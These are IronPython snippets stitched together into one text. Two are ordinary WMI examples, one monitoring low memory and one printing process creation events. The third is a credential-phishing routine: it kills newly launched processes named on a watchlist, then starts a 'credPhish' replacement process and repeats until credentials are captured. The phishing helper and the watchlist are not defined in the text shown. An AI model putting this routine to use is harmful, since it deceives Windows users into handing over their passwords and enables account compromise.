# For impersonation rather than authentication: # from System.Management import AuthenticationLevel, ImpersonationLevel # options.Impersonation = ImpersonationLevel.Impersonate # options.Authentication = AuthenticationLevel.Default options.EnablePrivileges = True scope = ManagementScope(r"\\FullComputerName\root\cimv2", options) # Available Physical Memory dropping below 10Mb wql = ('TargetInstance ISA "Win32_OperatingSystem" AND ' 'TargetInstance.FreePhysicalMemory < 10000 ') timeout = TimeSpan(0, 0, 5) query = WqlEventQuery("__InstanceModificationEvent", timeout, wql) watcher = ManagementEventWatcher() watcher.Query = query watcher.Scope = scope interesting_properties = ( 'FreePhysicalMemory', 'FreeSpaceInPagingFiles', 'FreeVirtualMemory', 'NumberOfProcesses', 'NumberOfUsers', 'OSArchitecture', 'ServicePackMajorVersion', 'ServicePackMinorVersion', 'SizeStoredInPagingFiles', 'Status', 'TotalVirtualMemorySize',
import clr clr.AddReference('System.Management') from System.Management import WqlEventQuery, ManagementEventWatcher from System import TimeSpan from System.Threading import Thread timeout = TimeSpan(0, 0, 1) query = WqlEventQuery("__InstanceCreationEvent", timeout, 'TargetInstance isa "Win32_Process"') watcher = ManagementEventWatcher() watcher.Query = query def arrived(sender, event): print 'Event arrived' real_event = event.NewEvent instance = real_event['TargetInstance'] for entry in instance.Properties: print entry.Name, entry.Value watcher.EventArrived += arrived watcher.Start() print 'started' while True: Thread.CurrentThread.Join(1000)
proc = e.NewEvent if proc['TargetInstance']['Name'] in WATCHLIST: Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill() print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine']) cp = credPhish(proc) print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments) cp.NewProcess.Start() print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode) def procWatch(): print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST)) while GOT_CRED is False: try: proc = startWatch.WaitForNextEvent() if proc['TargetInstance']['Name'] in WATCHLIST: Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill() print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine']) cp = credPhish(proc) if hasattr(cp, "NewProcess"): cp.NewProcess.Start() print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments) #Process.GetCurrentProcess.Kill() Thread.GetCurrentThread().Abort() except: break try: startWatch = ManagementEventWatcher(WqlEventQuery("__InstanceCreationEvent", TimeSpan(0,0,1), 'TargetInstance isa "Win32_Process"' )) procWatch() except KeyboardInterrupt: print "[*] Exiting."